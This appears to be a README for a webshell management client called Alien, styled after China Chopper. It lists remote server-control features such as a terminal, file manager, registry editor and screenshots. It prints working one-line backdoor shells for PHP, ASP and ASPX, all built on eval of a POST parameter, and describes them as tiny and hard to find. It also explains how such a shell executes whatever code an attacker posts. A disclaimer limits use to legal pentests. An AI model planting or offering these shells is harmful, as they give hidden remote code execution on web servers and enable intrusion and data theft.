Website Manager
This tool only use in legal pentest, reasearch and website management
You should take the consequence if you use in illegal purpose.
C# .NET Framework V4.8
- FileManager(Can display image file, search file)
- Virtual Terminal
- System Information
- Database Management
- RegEdit
- Monitor
- Screenshot
OneShell is a tool use in pentesting for control the server.
It can be very tiny and very difficult to be found.
These are the simplest oneshell.
- PHP
<?php @eval($_POST['password']);?>
- ASP
<%execute(request("password"))%>
- ASPX
<%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>
Also, Alien support asmx , ashx webshell
Original chopper jsp shell, but some addition.
it can display image
Differenti to php, asp, aspx, jsp...
It is difficult to use in pentestation, but use in management.
- MySQL : PHP
- Access : https://github.com/malbuffer4pt/DBer
- SQL Server : ASP ASPX ASMX ASHX
For PHP, eval() function can evaluate the string as a code.
if eval() contains a controllable variable, then we can execute any code we like.
Example: eval($_POST['a']);
HTTP POST a=phpinfo();
The the server will execute code "phpinfo();"
Every veteran who study in webshell.